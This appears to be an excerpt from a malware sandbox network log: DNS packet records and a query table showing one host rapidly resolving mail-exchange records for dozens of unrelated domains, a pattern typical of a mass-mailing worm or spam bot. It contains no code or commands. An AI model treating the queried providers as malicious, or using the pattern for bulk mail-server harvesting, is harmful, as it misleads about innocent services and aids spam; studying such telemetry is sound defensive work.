Feb 20, 2023 09:52:13.996675014 CET	50014	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:13.997525930 CET	53	50011	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:13.997859001 CET	53	50012	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:14.003177881 CET	53	50013	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:14.028593063 CET	53	50014	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:14.216034889 CET	50015	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:14.233164072 CET	53	50015	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:14.302498102 CET	50016	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:14.319467068 CET	53	50016	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:14.394100904 CET	50017	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:14.394349098 CET	50018	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:14.410996914 CET	53	50017	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:14.422199965 CET	53	50018	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:14.492762089 CET	61190	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:14.510369062 CET	53	61190	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:14.963118076 CET	61191	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:14.984153032 CET	61192	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:14.994918108 CET	53	61191	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:15.034980059 CET	53	61192	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:15.095721960 CET	61193	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:15.112905025 CET	53	61193	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:15.612560987 CET	61194	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:15.622543097 CET	61195	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:15.640132904 CET	53	61195	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:15.665849924 CET	53	61194	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:16.686995983 CET	61196	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:16.716937065 CET	53	61196	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:16.918404102 CET	61197	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:16.923082113 CET	61198	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:16.937860012 CET	53	61197	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:16.940207005 CET	53	61198	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:17.954921007 CET	61199	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:18.071196079 CET	53	61199	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:18.076663971 CET	62000	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:18.205238104 CET	53	62000	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:18.344944954 CET	62001	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:18.362678051 CET	53	62001	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:18.481230974 CET	62002	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:18.498406887 CET	53	62002	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:18.619824886 CET	62003	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:18.638863087 CET	53	62003	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:18.710385084 CET	62004	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:18.719311953 CET	62005	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:18.730160952 CET	53	62004	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:18.741507053 CET	53	62005	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:18.785293102 CET	62006	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:18.820254087 CET	53	62006	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:18.913155079 CET	62008	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:18.913237095 CET	62007	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:18.935686111 CET	53	62008	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:19.104353905 CET	53	62007	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:19.277873993 CET	62934	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:19.297688007 CET	53	62934	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:19.383297920 CET	62935	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:19.400259018 CET	53	62935	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:19.780833006 CET	62936	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:19.798002005 CET	53	62936	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:20.009655952 CET	62937	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:20.039546967 CET	53	62937	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:20.283066034 CET	62938	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:20.302826881 CET	53	62938	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:20.477914095 CET	62939	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:20.498152971 CET	53	62939	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:20.988312960 CET	62940	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:20.993719101 CET	62941	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:21.010580063 CET	53	62940	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:21.013571978 CET	53	62941	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:21.015558004 CET	51396	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:21.029397011 CET	59862	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:21.035080910 CET	53	51396	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:21.049257040 CET	53	59862	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:23.315038919 CET	59863	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:23.315953016 CET	59864	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:23.316406965 CET	59865	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:23.316895008 CET	59866	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:23.338444948 CET	53	59866	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:23.351917028 CET	53	59864	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:23.355293989 CET	53	59865	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:23.422354937 CET	58441	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:23.463279963 CET	53	58441	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:23.590147972 CET	53	59863	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:23.730288982 CET	51972	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:24.187211037 CET	51973	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:24.188864946 CET	51974	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:24.206415892 CET	53	51974	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:24.207151890 CET	53	51973	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:24.213040113 CET	49258	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:24.239270926 CET	53	49258	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:24.263324022 CET	53	51972	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:25.552150011 CET	49259	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:25.555005074 CET	49260	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:25.574986935 CET	53	49259	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:25.582818985 CET	55726	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:25.605881929 CET	53	49260	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:25.610598087 CET	53	55726	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:25.633441925 CET	57924	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:25.684554100 CET	53	57924	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:26.918253899 CET	57925	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:26.920257092 CET	57926	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:26.937467098 CET	53	57926	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:26.965159893 CET	53	57925	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:26.968558073 CET	61928	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:27.017905951 CET	53	61928	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:28.354849100 CET	61929	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:28.382065058 CET	53	61929	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:28.409698009 CET	61930	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:28.455787897 CET	61931	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:28.473747969 CET	53	61931	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:28.474834919 CET	53	61930	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:28.480895996 CET	53427	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:28.529593945 CET	53	53427	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:28.546715975 CET	53428	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:28.549681902 CET	53429	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:28.576508045 CET	53	53428	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:28.667476892 CET	53430	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:28.694819927 CET	53	53430	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:28.700731039 CET	60179	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:28.755259991 CET	53	60179	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:28.970740080 CET	60180	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:28.990405083 CET	53	60180	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.154721022 CET	60181	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.171946049 CET	53	60181	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.302870989 CET	60182	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.322598934 CET	53	60182	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.331284046 CET	60183	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.353977919 CET	53	60183	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.402739048 CET	60184	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.480679035 CET	60185	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.498670101 CET	53	60185	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.617352962 CET	60186	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.623583078 CET	53	60184	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.646533966 CET	53	60186	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.678884983 CET	60187	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.692491055 CET	60188	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.696472883 CET	53	60187	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.709577084 CET	60189	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.712127924 CET	53	60188	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.763267994 CET	60190	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.781193972 CET	53	60190	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.844022036 CET	60191	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.847074986 CET	60192	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.861732006 CET	53	60191	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.866183996 CET	53	60192	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:29.979403973 CET	60193	53	192.168.2.5	8.8.8.8
Feb 20, 2023 09:52:29.996558905 CET	53	60193	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:30.136449099 CET	53	60189	8.8.8.8	192.168.2.5
Feb 20, 2023 09:52:31.015826941 CET	53	53429	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 20, 2023 09:50:33.691226006 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	yahoo.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:33.742201090 CET	192.168.2.5	8.8.8.8	0xcca9	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:35.136528015 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	gzip.org	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:35.170485973 CET	192.168.2.5	8.8.8.8	0x30cb	Standard query (0)	gzip.org	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:35.247699976 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	alumni.caltech.edu	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:35.424556017 CET	192.168.2.5	8.8.8.8	0x5685	Standard query (0)	alumni-caltech-edu.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:36.190485001 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	cryptsoft.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.216934919 CET	192.168.2.5	8.8.8.8	0xced5	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:36.615365028 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	cryptsoft.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.748478889 CET	192.168.2.5	8.8.8.8	0xbd60	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:36.861618042 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	nongnu.org	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:36.973222971 CET	192.168.2.5	8.8.8.8	0xc140	Standard query (0)	eggs.gnu.org	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:41.714241028 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	nongnu.org	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:41.898246050 CET	192.168.2.5	8.8.8.8	0x6678	Standard query (0)	eggs.gnu.org	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:42.334381104 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	kinoho.net	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.376518011 CET	192.168.2.5	8.8.8.8	0xf686	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:42.733082056 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	gmail.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:42.762234926 CET	192.168.2.5	8.8.8.8	0xd3c5	Standard query (0)	gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:43.041174889 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	riseup.net	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:43.085211039 CET	192.168.2.5	8.8.8.8	0x789e	Standard query (0)	mx1.riseup.net	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:43.667500019 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	gmail.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:43.692118883 CET	192.168.2.5	8.8.8.8	0x6bf0	Standard query (0)	gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:44.627583027 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	mail.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:44.689867973 CET	192.168.2.5	8.8.8.8	0x9261	Standard query (0)	mxs.mail.ru	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:50:48.446297884 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:51.205521107 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:54.935436010 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:50:57.888490915 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:00.707521915 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:03.191668034 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:06.154134035 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:08.957344055 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:11.751753092 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:14.288825989 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:17.767703056 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:21.339468002 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:23.851691008 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:26.457947016 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	a1plus.at	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:26.497262001 CET	192.168.2.5	8.8.8.8	0x3a1c	Standard query (0)	smx01.a1.net	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:26.746928930 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:27.029757977 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	telering.at	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:27.071110010 CET	192.168.2.5	8.8.8.8	0xb68a	Standard query (0)	mx1c50.megamailservers.eu	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:27.111877918 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	a1plus.at	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:27.175259113 CET	192.168.2.5	8.8.8.8	0xb992	Standard query (0)	smx01.a1.net	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:27.348035097 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:27.697011948 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:28.935072899 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:29.264100075 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:29.582300901 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:30.125799894 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:30.333642960 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:30.669555902 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:30.991125107 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:31.918257952 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:32.168422937 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:32.385993958 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:32.584939957 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:32.732045889 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.128551006 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	bog.msu.ru	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.171611071 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.525861025 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	vub.ac.be	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.546865940 CET	192.168.2.5	8.8.8.8	0xa0a7	Standard query (0)	vub-ac-be.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:33.732856035 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.878786087 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	msn.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.908495903 CET	192.168.2.5	8.8.8.8	0xc8bc	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:33.922935963 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:33.987739086 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	msn.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.019577980 CET	192.168.2.5	8.8.8.8	0xcb4e	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:34.078430891 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.402978897 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	aol.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.411418915 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.424868107 CET	192.168.2.5	8.8.8.8	0x94c2	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:34.457564116 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	quatro.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.518831015 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	quatro.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.576858997 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	animo.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.627631903 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	animo.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.680526972 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	pirajui.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.686451912 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.739017010 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	pirajui.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.757896900 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	musical.com.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.825237989 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	quatro.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.897200108 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.br	0	3840	false
Feb 20, 2023 09:51:34.931894064 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	animo.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.943114996 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	quatro.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:34.998389006 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	xyz.com	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.026410103 CET	192.168.2.5	8.8.8.8	0xd6cc	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:35.029033899 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	pirajui.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.106221914 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	animo.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.112804890 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	xyz.com.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.605746984 CET	192.168.2.5	8.8.8.8	0xaa9d	Standard query (0)	mx2.mailchannels.net	A (IP address)	IN (0x0001)	false
Feb 20, 2023 09:51:35.623167992 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	quatro.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.652928114 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	pirajui.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.660238028 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.br	0	3840	false
Feb 20, 2023 09:51:35.749758005 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	quatro.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.750300884 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	animo.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.846771955 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:35.943875074 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	animo.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.947092056 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	pirajui.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:35.954201937 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.br	0	3840	false
Feb 20, 2023 09:51:35.993092060 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	x.com.pt	0	3840	false
Feb 20, 2023 09:51:36.154139042 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	pirajui.br	MX (Mail exchange)	IN (0x0001)	false
Feb 20, 2023 09:51:36.162897110 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	contoso.com.pt	0	3840	false
Feb 20, 2023 09:51:36.163604975 CET	192.168.2.5	8.8.8.8	0x11df	Standard query (0)	au.au-net.ne.jp	MX (Mail exchange)	IN (0x0001)	false
